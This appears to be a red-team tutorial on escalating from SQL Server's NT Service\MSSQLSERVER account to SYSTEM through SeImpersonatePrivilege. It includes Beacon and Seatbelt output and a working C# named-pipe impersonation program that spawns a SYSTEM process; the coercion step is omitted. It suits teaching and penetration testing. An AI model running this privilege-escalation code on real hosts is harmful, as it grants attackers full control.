MS SQL Privilege Escalation
This instance of SQL Server is running as NT Service\MSSQLSERVER, the default virtual service account in more modern SQL Server installations. Service accounts of this kind hold a special privilege called SeImpersonatePrivilege, which allows the account to "impersonate a client after authentication".
beacon> getuid
[*] You are NT Service\MSSQLSERVER
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges
====== TokenPrivileges ======
Current Token's Privileges
SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
[*] Completed collection in 0.037 seconds
In a nutshell, this privilege allows the process to impersonate any token it can obtain a handle to. However, since this account is not a local administrator, it cannot simply open a handle to a higher-privileged process (e.g. one running as SYSTEM) that is already running on the machine and take its token. The strategy behind the various "Potato" techniques is to coerce a SYSTEM service into authenticating to a rogue endpoint that the attacker controls, typically a named pipe or RPC server. While the service is authenticating, the rogue server impersonates it, and the resulting SYSTEM impersonation token can be duplicated into a primary token and used to spawn a new process.
SweetPotato bundles several of these techniques (including the PrintSpoofer and EfsRpc named-pipe variants) into a single .NET assembly, so it can be run via Beacon's execute-assembly command.
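The following is an added C# example of the impersonation half of that strategy; it is not code from this page or from SweetPotato. It stands up a named pipe server, waits for any client, impersonates it, and, if the client turns out to be SYSTEM and connected at impersonation level, duplicates the token into a primary token and launches a process with it using the SeImpersonatePrivilege this service account holds. The pipe name `demo_pipe` and the command line are hypothetical, and the step that coerces a SYSTEM service into connecting to the pipe is tool-specific and deliberately left out. It also assumes the pipe's default DACL admits the SYSTEM client; real tools normally set an explicit PipeSecurity.

```csharp
// Added example (not from the page or SweetPotato): rogue named-pipe server that
// impersonates its client and, if that client is SYSTEM, spawns a process as SYSTEM.
// Pipe name and command line are hypothetical; coercing the SYSTEM client is not shown.
using System;
using System.IO;
using System.IO.Pipes;
using System.Runtime.InteropServices;
using System.Security.Principal;

class PipeImpersonationDemo
{
    const uint TOKEN_ALL_ACCESS = 0xF01FF;
    const int SECURITY_IMPERSONATION = 2;   // SECURITY_IMPERSONATION_LEVEL
    const int TOKEN_PRIMARY = 1;            // TOKEN_TYPE
    const uint CREATE_NEW_CONSOLE = 0x10;

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct STARTUPINFO
    {
        public int cb; public string lpReserved; public string lpDesktop; public string lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }

    [StructLayout(LayoutKind.Sequential)]
    struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes,
        int ImpersonationLevel, int TokenType, out IntPtr phNewToken);

    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool CreateProcessWithTokenW(IntPtr hToken, uint dwLogonFlags, string lpApplicationName,
        string lpCommandLine, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
        ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

    [DllImport("kernel32.dll")]
    static extern bool CloseHandle(IntPtr hObject);

    static void Main(string[] args)
    {
        string pipeName = args.Length > 0 ? args[0] : "demo_pipe";                  // hypothetical
        string command = args.Length > 1 ? args[1] : @"C:\Windows\System32\cmd.exe"; // hypothetical
        IntPtr primaryToken = IntPtr.Zero;

        using (var server = new NamedPipeServerStream(pipeName, PipeDirection.InOut, 1))
        {
            Console.WriteLine($"[*] Listening on \\\\.\\pipe\\{pipeName} as {WindowsIdentity.GetCurrent().Name}");
            server.WaitForConnection();

            // ImpersonateNamedPipeClient fails with ERROR_CANNOT_IMPERSONATE unless the server
            // has already read data from the client, so consume one byte before impersonating.
            server.ReadByte();

            try
            {
                // RunAsClient wraps ImpersonateNamedPipeClient / RevertToSelf around the callback.
                server.RunAsClient(() =>
                {
                    // While impersonating, GetCurrent() returns the thread (client) token.
                    using (var client = WindowsIdentity.GetCurrent())
                    {
                        Console.WriteLine($"[*] Pipe client is {client.Name} (level: {client.ImpersonationLevel})");

                        // An identification-level token cannot be duplicated into a primary token.
                        if (client.ImpersonationLevel < TokenImpersonationLevel.Impersonation) return;
                        if (!client.IsSystem) { Console.WriteLine("[-] Client is not SYSTEM, ignoring"); return; }

                        // SeImpersonatePrivilege lets us turn the impersonation token into a primary one.
                        if (!DuplicateTokenEx(client.Token, TOKEN_ALL_ACCESS, IntPtr.Zero,
                                              SECURITY_IMPERSONATION, TOKEN_PRIMARY, out primaryToken))
                            Console.WriteLine($"[-] DuplicateTokenEx failed: {Marshal.GetLastWin32Error()}");
                    }
                }); // impersonation has been reverted at this point
            }
            catch (IOException ex)
            {
                Console.WriteLine($"[-] Impersonation failed: {ex.Message}");
            }
        }

        if (primaryToken == IntPtr.Zero) return;

        // Spawn with the duplicated primary token after reverting to our own identity.
        var si = new STARTUPINFO { cb = Marshal.SizeOf(typeof(STARTUPINFO)) };
        if (CreateProcessWithTokenW(primaryToken, 0, null, command, CREATE_NEW_CONSOLE,
                                    IntPtr.Zero, null, ref si, out PROCESS_INFORMATION pi))
        {
            Console.WriteLine($"[+] Spawned PID {pi.dwProcessId} as SYSTEM");
            CloseHandle(pi.hThread); CloseHandle(pi.hProcess);
        }
        else
            Console.WriteLine($"[-] CreateProcessWithTokenW failed: {Marshal.GetLastWin32Error()}");
        CloseHandle(primaryToken);
    }
}
```

Two details matter in practice: the server must read from the pipe before impersonating or the call fails outright, and a client that connected with SECURITY_IDENTIFICATION yields a token that can be inspected but never duplicated into a primary token, which is why the level is checked before DuplicateTokenEx. The process is launched only after RunAsClient has reverted to the service account, so the privilege check for CreateProcessWithTokenW runs against the token that actually holds SeImpersonatePrivilege.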